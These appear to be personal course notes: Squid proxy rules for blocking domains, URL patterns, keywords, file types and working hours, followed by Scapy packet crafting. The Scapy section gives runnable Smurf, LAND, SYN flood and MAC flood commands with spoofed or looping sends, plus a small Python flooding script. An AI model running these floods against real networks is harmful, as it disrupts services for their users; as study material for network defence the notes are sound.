

--- To block specific domain ---

We can block domains such as facebook.com and youtube.com by editing in squid.conf and add:
	
		acl blocklist1 dstdomain .facebook.com youtube.com   		
		http_access deny blocklist1

Here, ".facebook" will mean that it will block www.facebook.com , beta.facebook.com,etc 
but "youtube.com" means it will block exactly "youtube.com" & NOT www.youtube.com or studio.youtube.com



To restrict by a part of URL you can add:
	
		acl banned_reddit url_regex ^http://.*reddit.com/.*$
		http_access deny banned_reddit 


GOOGLE!!>>> pci-dss compliance, CISO, CIS benchmark, NIST benchmark, ISO 27001


If you want to allow/block specific website then make the entry of blocksites

	cat > /etc/squid/blockedsites.squid
	.gmail.com
	.tesla.com

	acl blocksites dctdomain "/etc/squid/blockedsites.squid"
	http_access deny blocksites

	OR

	cat > /etc/squid/blockedsites.squid
	^http://.*reddit.com/.*$
	^http://.*cdac.in/.*$


	acl blocksites url_regex "/etc/squid/blockedsites.squid"
	http_access deny blocksites





GOOGLE!!>>> Command & Control [C2], Data Exfiletration [sending data into chunks which is hard to detect by firewall]


To Block Ports goto squid.conf and add:

	acl block_port port 80
	http_access deny block_port

	acl safe_port port 80 21 563 70 1025-65535
	http_access deny !safe_port


To Block specific words do this:
	
	vim /etc/squid/ban_keyword.txt
	gambling
	spyware
	bad

	Now, in squid.conf add:
	acl bad_keywords url_regex "/etc/squid/ban_keyword.txt"
	http_access deny bad_keywords

To Block file type 

	vim /etc/squid/blockfiles.squid
	\.torrent.*$
	\.mp4.*$


	Now, goto squid.conf

	acl blockfile urlpath_regex "/etc/squid/blockfiles.squid"
	http_access deny blockfile



To set working hours add this in squid.conf:
	
	acl working_hours time 10:00-17:00
	http_access deny working_hours



GOOGLE!>> Lite Weight Active Protocol in linux and Active Directory in Windows
GOOGLE!>> chage -l root
GOOGLE!>> Pluggable Authentaction Module [pam.d]


__________________________________________________________________________________________________


							******** Packet Crafting using Python ******** 


--> Network Operations with Scapy

Scapy is a powerful interaction packet manipulation/crafting program.

Installation cmd:

	apt install scapy -y
	OR 
	yum install epel-release -y
	yum install scapy -y

CMD to start: scapy


ICMP Example:

		x = IP()
		y = ICMP()
		x.show()
		y.show()

		x.src = "x.x.x.x"
		x.dst = "y.y.y.y"


		send(x/y/"your_message")
		OR 
		send(x/y,count=10)
		OR
		send(x/y,loop=1) 					-- it will go into loop until you do Ctrl^



Send TCP Packets:

a=IP()
b=TCP()
a.src="x.x.x.x"
a.dst="y.y.y.y"
b.sport=53
b.dport=80

send((a/b),count=10) 

Attacks that can be performed by Scapy Packet Crafting:

	- Smurf Attack 			{Ping od Death}
	- LAND Attack			{DOS}
	- SYN Flood Attack		{DDOS}
	- MAC Flood Attack		{DDOS for DHCP}

1. Smurf Attack - very old attack & its closed
```````````````````````````````````````````````````````````````````````
It involves an attacker sending ICMP req(ping) to network's broadcast address(x.x.x.255). The attacker spoofs the source of the ICMP request to be th IP address of the intended victim. 

Reason: ICMP does not incluse Handshake, the destination has no way of verifying the source IP.

Now routers are pre-configured to not relay ICMP requests.

# scapy

>>> x = IP()/ICMP()
>>> x.show()

>>> x.src="victim'IP"
>>> x.dst="target'IP"

>>> x.show()
>>> send(x,loop=1)

+ CHECK IN WIRESHARK

2. LAND Attack:
````````````````DoS (Denial of Service)

Attack in which a packet is sent to a target machine with the same address ( Source Address and destination address the same ).


# scapy

>>> x = IP()/TCP()
>>> x.show()

>>> x.src="victim'IP"
>>> x.dst="victim'IP"

>>> x.show()
>>> send(x,loop=1)


3. SYN Flood Attack
````````````````````
SYN flood is also known as a half-open attack. In this attack, the attacker sends multiple connection requests to perform the distributed denial of service attack.


# scapy

>>> a = IP()
>>> b = TCP()

>>> a.src="zombie'IP"
>>> a.dst="victim'IP"
>>> b.flags="s"

>>> send(a/b,loop=1)


4. MAC Flood:
``````````````
# scapy

>>> a = Ether()
>>> a.src=RandMAC()
>>> a.dst="ff:ff:ff:ff:ff:ff"

>>> b = ARP()
>>> b.pdst='192.168.1.255'
>>> b.hwdst="ff:ff:ff:ff:ff:ff"

>>> send(a/b, iface="eth0", count=10, inter=.001)

OR

#!/usr/bin/python3
from scapy.all import *
num = int(input("Enter the number of packets "))
interface = input("Enter the Interface ")

a = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")

b = ARP(pdst='192.168.1.255',hwdst="ff:ff:ff:ff:ff:ff")

try:
  send(a/b, iface=interface, count=num, inter=.001)

except : 
  print("Destination Unreachable ")	